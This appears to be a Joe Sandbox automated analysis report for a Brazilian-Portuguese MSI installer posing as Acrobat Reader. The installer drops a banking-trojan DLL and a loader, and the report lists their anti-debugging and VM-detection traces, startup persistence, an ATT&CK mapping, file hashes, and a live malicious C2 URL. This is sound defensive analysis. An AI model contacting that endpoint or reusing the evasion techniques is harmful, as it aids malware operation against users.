Source: C:\Users\user\Pictures\Transfer.exe	RDTSC instruction interceptor: First address: 000000006ABE1561 second address: 000000006A700EAE instructions: 0x00000000 rdtsc 0x00000002 mov eax, dword ptr [69BDBFC0h] 0x00000007 mov edx, dword ptr [eax] 0x00000009 test edx, edx 0x0000000b jmp 00007F7FC54E5264h 0x00000010 je 00007F7FC4970318h 0x00000016 mov ecx, dword ptr [ebp+08h] 0x00000019 jmp 00007F7FC4FF475Bh 0x0000001e call 00007F7FC317A4DAh 0x00000023 call 00007F7FC5C781F2h 0x00000028 call 00007F7FC4BE5907h 0x0000002d push ebp 0x0000002e call 00007F7FC552172Dh 0x00000033 mov ebp, 725B3A32h 0x00000038 mov dword ptr [esp+0Ch], 5A151E15h 0x00000040 mov ebp, dword ptr [esp+ebp-725B3A2Eh] 0x00000047 call 00007F7FC4EBD979h 0x0000004c lea esp, dword ptr [esp+10h] 0x00000050 call 00007F7FC3D7F3DCh 0x00000055 push edi 0x00000056 movzx edi, sp 0x00000059 cmovnp di, di 0x0000005d push eax 0x0000005e cbw 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Pictures\Transfer.exe	RDTSC instruction interceptor: First address: 000000006BBECA40 second address: 000000006BD05C1E instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push edi 0x00000004 pushfd 0x00000005 mov edi, 5C400C28h 0x0000000a add di, di 0x0000000d jnc 00007F7FC4958BA3h 0x00000013 mov edi, dword ptr [esp+edi-5C40184Ch] 0x0000001a mov dword ptr [esp+04h], F5E981D1h 0x00000022 push dword ptr [esp+00h] 0x00000026 popfd 0x00000027 lea esp, dword ptr [esp+04h] 0x0000002b call 00007F7FC4D0AEF1h 0x00000030 push ebp 0x00000031 push edx 0x00000032 cwd 0x00000034 movzx edx, cx 0x00000037 push ecx 0x00000038 mov bp, bp 0x0000003b pushfd 0x0000003c push esi 0x0000003d sal bp, 0037h 0x00000041 sar edx, cl 0x00000043 push ebx 0x00000044 setl bh 0x00000047 btc si, 0005h 0x0000004c movsx ebp, si 0x0000004f push edi 0x00000050 shr bl, FFFFFFD8h 0x00000053 push eax 0x00000054 lahf 0x00000055 rdtsc
Source: C:\Users\user\Pictures\Transfer.exe	RDTSC instruction interceptor: First address: 000000006ABE1561 second address: 000000006A700EAE instructions: 0x00000000 rdtsc 0x00000002 mov eax, dword ptr [69BDBFC0h] 0x00000007 mov edx, dword ptr [eax] 0x00000009 test edx, edx 0x0000000b jmp 00007F7FC52EC644h 0x00000010 je 00007F7FC47776F8h 0x00000016 mov ecx, dword ptr [ebp+08h] 0x00000019 jmp 00007F7FC4DFBB3Bh 0x0000001e call 00007F7FC2F818BAh 0x00000023 call 00007F7FC5A7F5D2h 0x00000028 call 00007F7FC49ECCE7h 0x0000002d push ebp 0x0000002e call 00007F7FC5328B0Dh 0x00000033 mov ebp, 725B3A32h 0x00000038 mov dword ptr [esp+0Ch], 5A151E15h 0x00000040 mov ebp, dword ptr [esp+ebp-725B3A2Eh] 0x00000047 call 00007F7FC4CC4D59h 0x0000004c lea esp, dword ptr [esp+10h] 0x00000050 call 00007F7FC3B867BCh 0x00000055 push edi 0x00000056 movzx edi, sp 0x00000059 cmovnp di, di 0x0000005d push eax 0x0000005e cbw 0x00000060 push edx 0x00000061 rdtsc

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00881510 GetModuleFileNameW,GetCurrentProcessId,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Sleep,CloseHandle,Sleep,

3_2_00881510

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI842B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI8556.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI839D.tmp	Jump to dropped file

Source: C:\Users\user\Pictures\Transfer.exe

API coverage: 5.9 %

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_008875CA FindFirstFileExW,

3_2_008875CA

Source: C:\Users\user\Pictures\Transfer.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Transfer.exe, 00000003.00000002.581036778.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\7
Source: MSI8499.tmp.1.dr	Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: Transfer.exe, 00000003.00000002.581036778.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.0

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Pictures\Transfer.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00882DC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00882DC9

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00881510 GetModuleFileNameW,GetCurrentProcessId,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Sleep,CloseHandle,Sleep,

3_2_00881510

Source: C:\Users\user\Pictures\Transfer.exe

3_2_00881000

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00889302 GetProcessHeap,

3_2_00889302

Source: C:\Users\user\Pictures\Transfer.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00886268 mov eax, dword ptr fs:[00000030h]

3_2_00886268

Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\Pictures\Transfer.exe C:\Users\user\Pictures\Transfer.exe

Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe	Code function: 3_2_00882F17 SetUnhandledExceptionFilter,	3_2_00882F17
Source: C:\Users\user\Pictures\Transfer.exe	Code function: 3_2_00882821 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00882821
Source: C:\Users\user\Pictures\Transfer.exe	Code function: 3_2_00882DC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00882DC9
Source: C:\Users\user\Pictures\Transfer.exe	Code function: 3_2_008855D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_008855D7

Source: Transfer.exe, 00000003.00000002.581196742.0000000002A5F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROGRAM MANAGER@
Source: Transfer.exe, 00000003.00000002.581196742.0000000002998000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managerperience Host\Microsoft\Windows\Start Menu\Programs\Startup\Transfer.exe.lnkrm-urlencoded
Source: Transfer.exe, 00000003.00000002.581196742.0000000002A5F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ
Source: Transfer.exe, 00000003.00000002.581196742.0000000002A5F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROGRAM MANAGER

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_0088305C cpuid

3_2_0088305C

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00882CB2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00882CB2

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	2 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	2 Process Injection	21 Masquerading	1 Credential API Hooking	1 System Time Discovery	1 Replication Through Removable Media	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	1 Input Capture	551 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	22 Virtualization/Sandbox Evasion	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Process Injection	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Pictures\drivespan.dll	100%	Joe Sandbox ML
C:\Users\user\Pictures\Transfer.exe	0%	ReversingLabs
C:\Users\user\Pictures\drivespan.dll	49%	ReversingLabs	Win32.Trojan.BankerX
C:\Windows\Installer\MSI8235.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI839D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI842B.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI8499.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI8556.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.indyproject.org/	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://rentry.co/e6oicv/raw	0%	Avira URL Cloud	safe
http://81.161.229.121/005/postUP.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://81.161.229.121/005/postUP.php	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.advancedinstaller.com	Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	false		high
https://rentry.co/e6oicv/raw	Transfer.exe, 00000003.00000002.581528162.00000000698A1000.00000020.00000001.01000000.00000004.sdmp, Transfer.exe, 00000006.00000002.508629839.00000000698A1000.00000020.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indyproject.org/	Transfer.exe, 00000003.00000002.581196742.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, Transfer.exe, 00000003.00000002.581528162.00000000698A1000.00000020.00000001.01000000.00000004.sdmp, Transfer.exe, 00000006.00000003.507173820.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Transfer.exe, 00000006.00000002.508629839.00000000698A1000.00000020.00000001.01000000.00000004.sdmp	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Transfer.exe.1.dr	false		high
https://www.thawte.com/cps0/	Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	false		high
http://www.symauth.com/cps0(	Transfer.exe.1.dr	false		high
http://www.symauth.com/rpa00	Transfer.exe.1.dr	false		high
https://www.thawte.com/repository0W	Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	false		high
http://ocsp.thawte.com0	Transfer.exe.1.dr	false	URL Reputation: safe	unknown
http://www.nero.com	Transfer.exe.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
81.161.229.121	unknown	Germany		33657	CMCSUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	803457
Start date and time:	2023-02-10 01:07:27 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Fct63e39.msi
Detection:	MAL
Classification:	mal84.evad.winMSI@7/26@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 91.8%) Quality average: 75.4% Quality standard deviation: 31.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 7 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Fct63e39.msi

Simulations

Behavior and APIs

Time	Type	Description
01:09:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transfer.exe.lnk

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMCSUS	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\Installer\MSI8235.tmp	autorizacaoBUWFZCZN.msi	Get hash	malicious	Browse
	autorizacaoBUWFZCZN.msi	Get hash	malicious	Browse
	https://cld.pt/dl/download/9a9d89b2-99bf-4ca6-b445-5187b14ce9dc/TRANSF-A4-SIMPLEX-TLLK_B25293309_20230117.zip	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\5b7a96.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	1587
Entropy (8bit):	5.546275119531879
Encrypted:	false
SSDEEP:	24:egOZrCJIYhlTi6OZh26ANa8l/6+DJnynC5fdPz2sKmtf0xX6yatAyvLnyNW:exZOmYpARh+tyChZPAX6DAyv7yNW
MD5:	BE7866538FDA38C9A7E4D76EA6B91BFB
SHA1:	3D8C8D9E1A6E4EEB6F1CE0E33C766EC873084553
SHA-256:	11B353026FCCF35C7AD9F111E68FCAC6A723B64697B7A3A0E0810283125314B2
SHA-512:	25F121DB9287E1B3ACD2811A89DC6A273BE6BDE8A605283C943A03B8C00FA85254DD888578D7D966F5A90FA20D8B34F85272B669B353D4538648148C6C3BF34F
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@..JV.@.....@.....@.....@.....@.....@......&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}..Acrobat Reader..Fct63e39.msi.@.....@.....@.....@........&.{F1926830-DC49-4A34-9399-D3B31AA800D8}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{89B1F9F7-8D20-44A2-9FE8-ECC26A8CF0B9}&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}.@......&.{7F60C7AE-4947-4283-9AC6-C30F677CB007}&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}.@......&.{A5FC9F8D-BFA1-436E-8174-610300666563}&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}.@......&.{1782F7FC-AFB2-49C2-9271-CFB554C6A333}&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}.@......&.{1E9B8214-708F-41E1-ABD5-8092DBBC276F}&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}.@........CreateFolders..Criando novas pastas..Pasta: [1]#.=.C:\Users\user\AppData\Roaming\Acrobat Reader\Acrobat Reader

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transfer.exe.lnk

Download File

Process:	C:\Users\user\Pictures\Transfer.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Mon Jun 24 07:27:04 2019, mtime=Thu Feb 9 23:08:32 2023, atime=Mon Jun 24 07:27:04 2019, length=138520, window=hide
Category:	dropped
Size (bytes):	670
Entropy (8bit):	4.889820829488546
Encrypted:	false
SSDEEP:	12:8Ol6vFBwlKUDKu37tYjAK9ez+Re2lEeuEeMBm:8KKBwlKa78AK9eCYleneMBm
MD5:	442247F9AE6222C7B1B72421804769C1
SHA1:	66BE58B573F2CABBACC17C24471FABA1B1977A72
SHA-256:	87DB117F1B3590C25985B9C3D65D71F67B472BFE50B139B84688868451C25B96
SHA-512:	48964D4FB582E9FC8E9F0DB7D7AFB5C2BE7662EEECA696EDDD569D6FF657D476941E24B39E0B4ECC9897E0E7BEB74A3427F743C035360CEBB490A57F4A917F92
Malicious:	false
Reputation:	low
Preview:	L..................F.... .....<.f..Q....<....<.f...............................P.O. .:i.....+00.:....:.$i.0E....Az.&...&...........-..'....<.......<....f.2......NbC .Transfer.exe..J.......NbCJV......;.........................T.r.a.n.s.f.e.r...e.x.e.......S...............-.......R............Vl\|.....C:\Users\user\Pictures\Transfer.exe....D.r.i.v.e.r.S.p.a.n......\.....\.....\.....\.....\.....\.....\.P.i.c.t.u.r.e.s.\.T.r.a.n.s.f.e.r...e.x.e...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.P.i.c.t.u.r.e.s.\.`.......X.......530978...........!a..%.H.VZAj...."r.h............!a..%.H.VZAj...."r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K..@.A..7sFJ............

C:\Users\user\Pictures\Transfer.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	138520
Entropy (8bit):	5.97678172694547
Encrypted:	false
SSDEEP:	3072:h1tkoMvK2ZjKlrH5ySykwTzwk5aOz1b3aDczMns53:h1tkpZyCj1mDcIu3
MD5:	E04F15D35A1807C4D74D2538D5FE28C9
SHA1:	9A42B387BABDEA719D54C1E11BAAE9FDB9897F71
SHA-256:	7E4132835419E4C415D048B64A5FC2813B8D2FF72BB5586D857DCDF6A90A45F2
SHA-512:	0FA81E472CC65AC3E0DC6427D72002905C577B61C98CBB2859829EF5A139B1AC81FA09D680614C4EA94D599919E67C62F28475AF813400106DDDABE57180AAE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`u.h$.f;$.f;$.f;...;-.f;...;].f;...;<.f;.Je:6.f;.Jc:..f;.Jb:6.f;..;-.f;$.g;y.f;.Jo:&.f;.J.;%.f;$..;%.f;.Jd:%.f;Rich$.f;........PE..L....&.].........."..................(............@..........................@......Q.....@.................................DI..d.......8................3...0......@;..p............................;..@...............4............................text.../........................... ..`.rdata..L`.......b..................@..@.data........`.......8..............@....gfids...............B..............@..@.rsrc...8............D..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\drivespan.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17605632
Entropy (8bit):	7.993504857611233
Encrypted:	true
SSDEEP:	393216:Ef/YQ9h5Dr5Bgmp8ZQahwEOawl0bO6iawDzEKbGa7Y9c0gBYGMs:Ef79n5impMwdl0a6i/dqe0g6GN
MD5:	94AA76E7E2101B86D931C1FACCD1DAC8
SHA1:	64E8898B2BA1F5C26305A8D1382327C42636D27F
SHA-256:	75871A779B22D994ABC13A4D789EC00100FAAEE4CE5EB71E40942A8038AE6090
SHA-512:	3C12308169E6713D5241F8D28F8029E6268A56BFAAB1041E52F0656530F58D82735AA1D5A42903525437A1BAB702DACB76368C5CE18C580EA25125E1DEF26B92
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L......c................../..V.......B.......@/...@..........................@)...........@...........................".........X............................0)............................................................. ........................text............................... ..`.itext..,$..../..................... ..`.data...p....@/.....................@....bss....ho...P0..........................idata...=....0.....................@....didata.......1.....................@....edata........1.....................@..@.rdata..D.... 1.....................@..@.948.....]...01..................... ..`.Ske................................@....Rt_....`........................... ..`.reloc.......0).....................@..B.............................................................@.......r..............@..@........................................................

C:\Windows\Installer\5b7a94.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F1926830-DC49-4A34-9399-D3B31AA800D8}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader (Evaluation Installer), Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	19766784
Entropy (8bit):	7.94129378454755
Encrypted:	false
SSDEEP:	393216:9BhRuNbiYh8TB9GDpJb4UR6zCyIt0DwludpgK87gfnR3Ttf1wDAC3Zzp:n+biTTBgDpx6Qt0klur9ZJf1OAAZz
MD5:	867C50852F18578FA033FA351AD79913
SHA1:	0CEBA904D6FF7AD9696AF3ABD6D17A23645D9C40
SHA-256:	01678F0B037B244A527B964AA9C32C5F7F554CBFB77305747CF42D5019775D4D
SHA-512:	B089C45993C545135DD81A941618A95EFC75A3B81DF97DF76CACFC22ABC93CBE6C3D73F89C636C78E1BF7295DDD8606EB34E371753B4D92041B70F7F26F0000C
Malicious:	false
Reputation:	low
Preview:	......................>.......................................................F.......c.......o.......................................p...................................................................................................................................................................................................................................................................................................................................................................................................<...........!...4............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...5...2...3...=...@...6...7...8...9...:...;...?...0...>...........A...B...C...D...E...........H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI8235.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	570784
Entropy (8bit):	6.45015034296188
Encrypted:	false
SSDEEP:	6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
MD5:	2C9C51AC508570303C6D46C0571EA3A1
SHA1:	E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
SHA-256:	FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
SHA-512:	DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
